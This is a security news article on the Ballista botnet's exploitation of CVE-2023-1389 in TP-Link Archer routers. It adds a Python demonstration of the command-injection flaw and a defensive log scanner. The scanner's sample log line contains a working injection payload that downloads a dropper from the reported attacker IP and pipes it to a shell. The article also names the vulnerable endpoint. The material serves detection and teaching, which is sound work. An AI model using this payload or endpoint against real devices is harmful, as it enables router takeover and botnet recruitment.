New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?

Pierluigi Paganini March 12, 2025

The Ballista botnet is exploiting a known TP-Link vulnerability on Archer routers that have not been patched; more than 6,000 exposed devices are in its sights, Cato CTRL researchers warn.

Cato CTRL researchers have observed a new botnet, dubbed Ballista, that exploits a remote code execution (RCE) vulnerability, tracked as CVE-2023-1389 (CVSS score 8.8), in TP-Link Archer routers.

CVE-2023-1389 is an unauthenticated command injection vulnerability in the locale API of the web management interface of the TP-Link Archer AX21 router. The root cause is missing input sanitization in the locale API, which manages the router’s language settings: the value submitted for the country setting reaches a shell command without validation, so an unauthenticated remote attacker can inject commands that the device executes with root privileges. TP-Link has shipped fixed firmware since 2023, so the routers Ballista compromises are those still running unpatched builds.

The vulnerability was first reported to ZDI during the Pwn2Own Toronto 2022 event, where Team Viettel and Qrious Security demonstrated working exploits against the LAN and WAN interfaces respectively.
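
To make the root cause concrete, the following is an added Python model of the bug class behind CVE-2023-1389; it is not TP-Link’s firmware code (the real handler is native code on the router). The vulnerable handler splices the `country` value into a shell command string, while the hardened handler allowlists the value and passes it as a separate argv element so no shell ever parses it. `echo` stands in for whatever command the firmware actually runs, and the parameter name `country` follows the Cato CTRL description of the endpoint; both are assumptions.

```python
"""The bug class behind CVE-2023-1389: a request parameter spliced into a
shell command line, next to the hardened form of the same handler.

Added example, not TP-Link's firmware code. `echo` stands in for whatever
the real locale handler invokes, and the parameter name `country` follows
the Cato CTRL description of the endpoint; both are assumptions.
"""
import re
import subprocess

# Allowlist: "en", "en_US", "US" and the like. Anything else is rejected outright.
LOCALE_RE = re.compile(r"^[A-Za-z]{2}(?:_[A-Za-z]{2})?$")


def set_locale_unsafe(country: str) -> str:
    """Vulnerable pattern: the untrusted value is interpolated into a command
    string that a shell then parses, so ';', '|', '$(...)' and friends become
    new commands running with the web server's privileges (root on the router).
    Returns the shell's stdout so the effect of the injection is visible."""
    cmd = f"echo locale={country}"  # stand-in for the firmware's real command
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def set_locale_safe(country: str) -> str:
    """Hardened pattern: validate against a strict allowlist first, then pass
    the value as its own argv element so no shell ever interprets it."""
    if not LOCALE_RE.fullmatch(country):
        raise ValueError(f"rejected locale value: {country!r}")
    proc = subprocess.run(["echo", f"locale={country}"], capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "en_US;echo INJECTED"  # constructed injection value
    print(set_locale_unsafe(payload), end="")  # locale=en_US, then INJECTED
    try:
        set_locale_safe(payload)
    except ValueError as exc:
        print(exc)
```

In C firmware the same pair is a `snprintf`-built string handed to `system()` versus an allowlisted argument handed to `execv()`; the fix is the same in either language: the untrusted value must never reach a shell parser.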

Since early 2025, Cato CTRL has tracked the Ballista botnet targeting TP-Link Archer routers via CVE-2023-1389. Because the flaw is exploitable without authentication, the botnet spreads automatically from one infected router to the next. The researchers first detected the botnet on January 10, 2025; it later evolved to use Tor domains for its infrastructure to hide its command and control. The most recent attack attempt they observed occurred on February 17, 2025. Separately, TP-Link devices have faced scrutiny, with U.S. agencies reportedly considering a ban over security concerns linked to China.

“As part of its initial access vector, the Ballista botnet exploits CVE-2023-1389. This vulnerability in the TP-Link Archer router’s web management interface (T1190) stems from the lack of sanitization of user input in the country form of the /cgi-bin/luci;stok=/locale endpoint, resulting in unauthenticated command execution (T1059.004) with root privileges.” reads the Cato report. “The botnet exploits this vulnerability by injecting a payload that downloads and executes a cleartext shell dropper named dropbpb.sh, responsible for downloading the malware binaries and executing them on the compromised device.”

The injected payload is a bash one-liner that downloads the dropper from an attacker-controlled server (2.237.57[.]70) over plain HTTP on port 81, grants it full permissions and executes it as a background process. Once running, the dropper deletes itself from disk, moves through other directories, and downloads and runs the malware binaries. The process includes persistence, system exploration and anti-detection techniques to maintain control over infected devices.
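
The endpoint named in the Cato report and the staging server described above give a defender enough to hunt for exploitation attempts in web-server or proxy access logs. The following is an added Python example, not code from the Cato CTRL report or the article: it parses access-log lines, isolates requests to the locale endpoint whose `country` value carries shell metacharacters, URL-decodes the payload, and extracts the download host and port as indicators. The sample log lines are constructed, the payload is assumed to arrive in the `country` query parameter, and the dropper URL path is an assumption (the report names the file, not the URL).

```python
"""Flag CVE-2023-1389 exploitation attempts in HTTP access logs and pull
download hosts out of the injected payload.

Added example, not code from the Cato CTRL report or the article. It assumes
the injected command arrives in the `country` parameter of the locale
endpoint named in the report; the sample log lines are constructed, and the
dropper path used in them is an assumption.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Request line of a common/combined-format access log entry.
REQ_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Locale handler path of the LuCI-based web UI; stok is empty on unauthenticated requests.
LOCALE_PATH_RE = re.compile(r"^/cgi-bin/luci/?;stok=[^/]*/locale$")
# Shell metacharacters that never belong in a locale/country value.
META_RE = re.compile(r"[;&|`$\n]")
# IPv4 host with optional port inside the payload (download location).
HOST_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")
# Staging server and ports reported for Ballista (dropper on 81, C2 on 82).
KNOWN_HOSTS = {"2.237.57.70"}
KNOWN_PORTS = {81, 82}

# Constructed sample: one exploitation attempt, one benign read, one benign write, one unrelated hit.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Feb/2025:10:21:07 +0000] "GET /cgi-bin/luci;stok=/locale?form=country&operation=write&country=%24(wget%20http%3A%2F%2F2.237.57.70%3A81%2Fdropbpb.sh%20-O-%7Csh) HTTP/1.1" 200 114',
    '192.0.2.11 - - [17/Feb/2025:10:22:15 +0000] "GET /cgi-bin/luci;stok=/locale?form=country&operation=read HTTP/1.1" 200 88',
    '192.0.2.12 - - [17/Feb/2025:10:23:01 +0000] "GET /cgi-bin/luci;stok=/locale?form=country&operation=write&country=en_US HTTP/1.1" 200 88',
    '192.0.2.13 - - [17/Feb/2025:10:24:44 +0000] "GET /index.html HTTP/1.1" 200 1532',
]


@dataclass
class Finding:
    src: str
    ts: str
    payload: str                                  # decoded value of the country parameter
    hosts: list = field(default_factory=list)     # [(ip, port)] extracted from the payload
    known_ioc: bool = False                       # matches a reported Ballista host or port


def analyze_line(line: str):
    """Return a Finding for an injection attempt on the locale endpoint, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not LOCALE_PATH_RE.match(target.path):
        return None
    params = parse_qs(target.query, keep_blank_values=True)
    if params.get("form") != ["country"]:
        return None
    for value in params.get("country", []):       # parse_qs already percent-decodes
        if not META_RE.search(value):
            continue                              # plain locale such as en_US
        hosts = [(ip, int(port) if port else 80) for ip, port in HOST_RE.findall(value)]
        known = any(ip in KNOWN_HOSTS or port in KNOWN_PORTS for ip, port in hosts)
        return Finding(m.group("src"), m.group("ts"), value, hosts, known)
    return None


def scan(lines):
    """Run analyze_line over an iterable of log lines and collect the findings."""
    return [f for f in map(analyze_line, lines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.src} payload={f.payload!r} hosts={f.hosts} known_ioc={f.known_ioc}")
```

Any hit on the locale endpoint from the WAN side is worth a look on its own, since the management interface should not be reachable from the internet at all; the metacharacter check separates exploitation from ordinary language changes, and the extracted host and port feed straight into egress blocking for the next stage of the infection.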

The malware first kills any previous instances of itself, deletes its own file to evade detection, reads system configuration files, and establishes an encrypted C2 channel on port 82. It spreads by exploiting CVE-2023-1389 on other routers and, when instructed by the C2 server, can execute remote shell commands or launch DoS/DDoS attacks.

The malware’s C2 commands include “shell”, for executing bash commands, and “flooder”, for launching attacks. The shell module gives the operator backdoor access that can be used for data exfiltration and persistence. The flooder module, triggered by specific parameters, continuously spawns new threads to carry out the attack; it sends encrypted data over a RAW socket, which limited further analysis. The malware’s modular design suggests support for multiple flood attack types, although only one has been identified so far.

Cato links the Ballista botnet to an Italy-based threat actor; the attribution rests on an Italian IP address and Italian-language strings in the malware’s code. Named after the ancient Roman siege weapon, Ballista targets TP-Link Archer routers and has affected organizations in the manufacturing, healthcare, services and technology sectors in the U.S., Australia, China and Mexico. A Censys search found more than 6,500 internet-exposed devices vulnerable to CVE-2023-1389. The botnet remains active, combining its C2 protocol, discovery techniques and DoS capabilities to keep control of infected systems.

“IoT devices have been constantly targeted by threat actors for multiple reasons,” concludes the report. “Proactive identification and management of IoT devices within an organization’s network remain essential for mitigating risk and ensuring the resilience of critical infrastructure.”


Pierluigi Paganini

(SecurityAffairs – hacking, Ballista botnet)

